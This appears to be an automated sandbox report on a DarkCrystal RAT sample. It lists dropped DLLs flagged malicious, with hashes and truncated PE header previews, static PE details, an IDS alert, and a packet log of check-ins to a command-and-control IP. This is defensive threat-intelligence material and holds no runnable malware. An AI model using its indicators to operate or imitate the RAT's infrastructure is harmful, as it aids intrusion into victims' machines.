                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\vYOmNlRn.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):70144
                                                                                                                                                                  Entropy (8bit):5.909536568846014
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\voDmexRC.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):33792
                                                                                                                                                                  Entropy (8bit):5.541771649974822
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\wGHUzQXl.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):36352
                                                                                                                                                                  Entropy (8bit):5.668291349855899
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                                                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                                                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                                                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                                                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\xuLckdTj.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):34304
                                                                                                                                                                  Entropy (8bit):5.618776214605176
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                                                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                                                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                                                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                                                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\ymdvPcsA.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):23552
                                                                                                                                                                  Entropy (8bit):5.529329139831718
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                                                                                                  MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                                                                                                  SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                                                                                                  SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                                                                                                  SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\zeucltSv.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):342528
                                                                                                                                                                  Entropy (8bit):6.170134230759619
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                  \Device\Null

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\PING.EXE
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):502
                                                                                                                                                                  Entropy (8bit):4.621947447102293
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:Pew5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:GydUOAokItULVDv
                                                                                                                                                                  MD5:7534E417AE2279B7FC687387A16CC0F6
                                                                                                                                                                  SHA1:1DC46DE6C5C1C9D7A8A00BD2B7D0EF3004C32D41
                                                                                                                                                                  SHA-256:2EF6B6524032C7F3CBBF19FA75E02D822073CA3931A2F57BB2F37860E4D7CB5E
                                                                                                                                                                  SHA-512:AE5E93965515784503CD77DDD777E450B2D20F00FCF65995FCD4D43B62406154C3A9F809293892EC6213AD89DFC82CBD3EF4CE976E22FDB0C9E55BD63772EF3F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..Pinging 358075 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                                                                                                                  Static File Info

                                                                                                                                                                  General

                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Entropy (8bit):4.636841546952749
                                                                                                                                                                  TrID:
                                                                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                                                  File name:zZ1Y43bxxV.exe
                                                                                                                                                                  File size:2'615'296 bytes
                                                                                                                                                                  MD5:cdac978772a7616686c0efe2727ce902
                                                                                                                                                                  SHA1:b316852fe5b1c54c61ffefac1bc9032091d26cb0
                                                                                                                                                                  SHA256:fcfb73997e95a7b8dfd22e302a1b18f8c7075a127bf33f7c9d8bc203984bcdf6
                                                                                                                                                                  SHA512:0aebdbce0e3eb504dfa6e41d5ccc149fa5057e322333d3f10481b286a87c18813bda72f81757bf563b38251db4248d8695e64d37db8464423fb2b68b20d55d35
                                                                                                                                                                  SSDEEP:24576:jTcFTu7e+WCw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFnNtInx6t1:PcFn+gMcQmQmqycMxFNyn
                                                                                                                                                                  TLSH:79C57D3439FB502AB173EFB58AE4789ADA6FB6B33707585E205103864713A81DDC163E
                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......'...........'.. ....(...@.. .......................@(.......(...@................................

                                                                                                                                                                  File Icon

                                                                                                                                                                  Icon Hash:90cececece8e8eb0

                                                                                                                                                                  Static PE Info

                                                                                                                                                                  General

                                                                                                                                                                  Entrypoint:0x67fe0e
                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                  Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                  File Version Major:4
                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                  Instruction
                                                                                                                                                                  jmp dword ptr [00402000h]
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al

                                                                                                                                                                  Data Directories

                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x27fdb40x57.text
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x2800000x370.rsrc
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x2820000xc.reloc
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                  Sections

                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                  .text0x20000x27de140x27e0002388a60dc1b90d01b21fec904d9662f7unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                  .rsrc0x2800000x3700x40056e610f95b668c6b463aff842f680a11False0.3759765625data2.854832632722979IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                  .reloc0x2820000xc0x200f1f96e9384d29b76a7af34a03849cc94False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                  Resources

                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                  RT_VERSION0x2800580x318data0.44823232323232326

                                                                                                                                                                  Imports

                                                                                                                                                                  DLLImport
                                                                                                                                                                  mscoree.dll_CorExeMain

                                                                                                                                                                  Network Behavior

                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                  2025-01-03T09:07:14.471923+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44973286.110.194.2880TCP

                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                  TCP Packets

                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                  Jan 3, 2025 09:07:13.658143997 CET4973280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:13.662960052 CET804973286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:13.663039923 CET4973280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:13.663677931 CET4973280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:13.668461084 CET804973286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:14.020428896 CET4973280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:14.025388002 CET804973286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:14.375729084 CET804973286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:14.471868992 CET804973286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:14.471879959 CET804973286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:14.471923113 CET4973280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:14.595175982 CET4973280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:14.601785898 CET804973286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:14.668575048 CET4973580192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:14.673423052 CET804973586.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:14.673593998 CET4973580192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:14.673593998 CET4973580192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:14.678369045 CET804973586.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:14.806215048 CET804973286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:14.806637049 CET4973280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:14.811391115 CET804973286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:15.019939899 CET4973580192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:15.022274971 CET804973286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:15.024748087 CET804973586.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:15.024756908 CET804973586.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:15.024765968 CET804973586.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:15.029629946 CET4973280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:15.034456968 CET804973286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:15.240533113 CET804973286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:15.240725040 CET4973280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:15.245507002 CET804973286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:15.367511034 CET804973586.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:15.456553936 CET804973286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:15.457134008 CET4973280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:15.461981058 CET804973286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:15.488487005 CET4973580192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:15.498719931 CET804973586.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:15.597865105 CET4973580192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:15.668015957 CET804973286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:15.668198109 CET4973280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:15.672962904 CET804973286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:15.673110008 CET804973286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:15.898541927 CET4973580192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:15.900091887 CET4973780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:15.903659105 CET804973586.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:15.903738976 CET4973580192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:15.904890060 CET804973786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:15.907480955 CET4973780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:15.907654047 CET4973780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:15.912504911 CET804973786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:16.043838978 CET804973286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:16.097862005 CET4973280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:16.254221916 CET4973780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:16.259090900 CET804973786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:16.259119034 CET804973786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:16.259130955 CET804973786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:16.602940083 CET804973786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:07:16.660022020 CET4973780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:07:16.846651077 CET804973786.110.194.28192.168.2.4
